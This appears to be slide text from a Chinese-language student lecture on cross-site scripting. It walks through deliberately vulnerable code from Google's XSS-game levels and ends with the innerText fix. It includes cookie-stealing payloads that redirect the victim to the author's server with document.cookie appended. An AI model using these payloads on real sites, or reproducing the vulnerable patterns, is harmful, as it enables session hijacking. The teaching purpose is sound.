輔大資工四乙 – 黃品翰 ( halloworld )
blog: blog.halloworldis.me
NISRA 核心幹部吧
AIS3 兩次專題落選人
AIS3 2019(Crypto)
AIS3 2020(網頁安全)
109 年度行政院攻擊手 - 落選人
榮耀資戰(一般組)沒得名
輔大專題試驗室(二)風紀股長
~~歡迎有興趣的一起打CTF~~
Intro
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
//這裡放CSS
<style>
h1{
color : red;
}
p{
color : blue;
}
</style>
//這裡放javascript
<script>
function clickla()
{
document.getElementById('demo').innerHTML = Date();
}
</script>
//這裡放html
<body>
<h1 class="txt">This is a Heading</h1>
<button type="button" onclick="clickla()">Click me to display Date and Time.</button>
<p id="demo">This is a paragraph.</p>
</body>
</html>
直接輸入就可以執行Javascript了
a = 0.1 + 0.2
0.30000000000000004
a 是 0.3 ?????
Intro
(你覺得js都是正常的js嗎?)
document.getElementsByTagName('body')[0].innerHTML=""
填下想要的留言
<script>....</script>
讓使用者發出惡意的請求(例如,網址上、奇怪的按鈕)
後端PHP
後端PHP
插入<script>alert(123)</script>
DOM 全稱為 Document Object Model
想對DOM有更深的了解,可以看以下這篇
儲存型XSS,會將惡意語法存入伺服器資料庫中
def get(self):
# Disable the reflected XSS filter for demonstration purposes
self.response.headers.add_header("X-XSS-Protection", "0")
if not self.request.get('query'):
# Show main search page
self.render_string(page_header + main_page_markup + page_footer)
else:
query = self.request.get('query', '[empty]')
# Our search engine broke, we found no results :-(
message = "Sorry, no results were found for <b>" + query + "</b>."
message += " <a href='?'>Try again</a>."
# Display the results page
self.render_string(page_header + message + page_footer)
return
function displayPosts() {
var containerEl = document.getElementById("post-container");
containerEl.innerHTML = "";
var posts = DB.getPosts();
for (var i=0; i<posts.length; i++) {
var html = '<table class="message"> <tr> <td valign=top> '
+ '<img src="/static/level2_icon.png"> </td> <td valign=top '
+ ' class="message-container"> <div class="shim"></div>';
html += '<b>You</b>';
html += '<span class="date">' + new Date(posts[i].date) + '</span>';
html += "<blockquote>" + posts[i].message + "</blockquote";
html += "</td></tr></table>"
containerEl.innerHTML += html;
}
}
function chooseTab(num) {
// Dynamically load the appropriate image.
var html = "Image " + parseInt(num) + "<br>";
html += "<img src='/static/level3/cloud" + num + ".jpg' />";
$('#tabContent').html(html);
window.location.hash = num;
// Select the current tab
var tabs = document.querySelectorAll('.tab');
for (var i = 0; i < tabs.length; i++) {
if (tabs[i].id == "tab" + parseInt(num)) {
tabs[i].className = "tab active";
} else {
tabs[i].className = "tab";
}
}
// Tell parent we've changed the tab
top.postMessage(self.location.toString(), "*");
}
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
<br>
<div id="message">Your timer will execute in {{ timer }} seconds.</div>
</body>
timer.html
index.html
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<form action="" method="GET">
<input id="timer" name="timer" value="3">
<input id="button" type="submit" value="Create timer"> </form>
</form>
</body>
<body id="level5">
<img src="/static/logos/level5.png" /><br><br>
Thanks for signing up, you will be redirected soon...
<script>
setTimeout(function() { window.location = '{{ next }}'; }, 5000);
</script>
</body>
confirm.html
signup.html
<body id="level5">
<img src="/static/logos/level5.png" /><br><br>
<!-- We're ignoring the email, but the poor user will never know! -->
Enter email: <input id="reader-email" name="email" value="">
<br><br>
<a href="{{ next }}">Next >></a>
</body>
function includeGadget(url) {
var scriptEl = document.createElement('script');
// This will totally prevent us from loading evil URLs!
if (url.match(/^https?:\/\//)) {
setInnerText(document.getElementById("log"),
"Sorry, cannot load a URL containing \"http\".");
return;
}
// Load this awesome gadget
scriptEl.src = url;
only alert(1) ?
document.location.href = "http://vm.halloworldis.me:8000/" + btoa(document.cookie)
document.location.href = "http://vm.halloworldis.me:8000/" + encodeURI(document.cookie)
我的釣魚網站
讓網頁跳轉
當前網頁的cookie
//inner HTML,會插入HTML的元素
document.getElementById('show_name').innerHTML = name;
//改用inner Text,才能保證作為純粹文字
document.getElementById('show_name').innerText = name;